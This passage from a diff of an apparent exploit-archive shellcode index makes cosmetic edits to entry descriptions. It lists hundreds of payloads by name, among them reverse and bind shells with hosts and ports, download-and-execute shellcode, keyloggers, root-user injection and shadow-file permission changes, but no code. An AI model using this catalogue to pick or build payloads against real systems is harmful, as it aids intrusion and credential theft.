(Little Endian) - chmod(/etc/passwd 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips 36359,shellcodes/linux_x86-64/36359.c,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64 -36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) + ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 -36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts + Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 @@ -492,7 +492,7 @@ id,file,description,date,author,type,platform 36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86 36779,shellcodes/windows_x86/36779.c,"Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 -36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator +36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve() + 'Followtheleader' Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator 36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86 36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86 @@ -502,17 +502,17 @@ id,file,description,date,author,type,platform 37285,shellcodes/linux_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86 -37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 +37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir(HACK) + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86 -37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 +37366,shellcodes/linux_x86/37366.c,"Linux/x86 - reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86 37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 -37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 +37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() + Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)",2015-07-05,"Artem T",shellcode,linux_x86 37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86 37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86 @@ -547,7 +547,7 @@ id,file,description,date,author,type,platform 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86 39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm -39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86 +39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86 39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 @@ -559,16 +559,16 @@ id,file,description,date,author,type,platform 39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 39728,shellcodes/generator/39728.py,"Linux/x64 - Bind (/TCP) Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator -39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows +39731,shellcodes/windows/39731.c,"Windows - Keylogger To File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows 39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86 39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows +39794,shellcodes/windows/39794.c,"Windows - Keylogger To File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator 39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple +39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,shellcode,multiple 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86 @@ -580,7 +580,7 @@ id,file,description,date,author,type,platform 40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86 40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64 40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86 -40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 +40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse (127.1.1.1:10/TCP) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86 40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 @@ -640,9 +640,9 @@ id,file,description,date,author,type,platform 43639,shellcodes/linux_x86/43639.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86 43640,shellcodes/bsd_x86/43640.c,"BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 43641,shellcodes/linux_x86/43641.c,"Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)",2009-01-01,dev0id,shellcode,linux_x86 -43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 -43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86 -43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86 43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86 @@ -658,7 +658,7 @@ id,file,description,date,author,type,platform 43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86 43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86 43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86 -43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86 +43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) Via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86 43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86 43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86 43664,shellcodes/linux_x86/43664.c,"Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86 @@ -675,7 +675,7 @@ id,file,description,date,author,type,platform 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86 43681,shellcodes/linux_x86/43681.c,"Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)",2009-01-01,antrhacks,shellcode,linux_x86 43684,shellcodes/linux_x86/43684.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)",2009-01-01,agix,shellcode,linux_x86 -43685,shellcodes/linux_x86/43685.c,"Linux/x86 - Remote File Download Shellcode (42 bytes)",2009-01-01,"Jonathan Salwan",shellcode,linux_x86 +43685,shellcodes/linux_x86/43685.c,"Linux/x86 - Download File Shellcode (42 bytes)",2009-01-01,"Jonathan Salwan",shellcode,linux_x86 43686,shellcodes/linux_x86/43686.c,"Linux/x86 - CDRom Ejecting Shellcode (46 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 43687,shellcodes/linux_x86/43687.c,"Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)",2009-05-31,gunslinger_,shellcode,linux_x86 43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 @@ -715,9 +715,9 @@ id,file,description,date,author,type,platform 43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43737,shellcodes/linux_x86/43737.c,"Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43737,shellcodes/linux_x86/43737.c,"Linux/x86 - reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43738,shellcodes/linux_x86/43738.c,"Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve(wget) + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator 43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86 @@ -726,9 +726,9 @@ id,file,description,date,author,type,platform 43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86 43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind (/TCP) Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86 43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86 -43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86 -43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 -43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 +43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + Execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86 +43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 +43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd To /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86 43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86 @@ -759,13 +759,13 @@ id,file,description,date,author,type,platform 40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 +40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh -c reboot) Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse (/TCP) Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 +41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir(ajit) Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux @@ -801,12 +801,12 @@ id,file,description,date,author,type,platform 43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix -43510,shellcodes/irix/43510.c,"IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix +43510,shellcodes/irix/43510.c,"IRIX - Bind (/TCP) Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm -43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm -43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm +43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm +43531,shellcodes/arm/43531.c,"Linux/ARM - chmod(/etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm 43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm @@ -818,14 +818,14 @@ id,file,description,date,author,type,platform 43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4 43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc -43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 +43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - execve(/bin/sh) Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 -43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) To 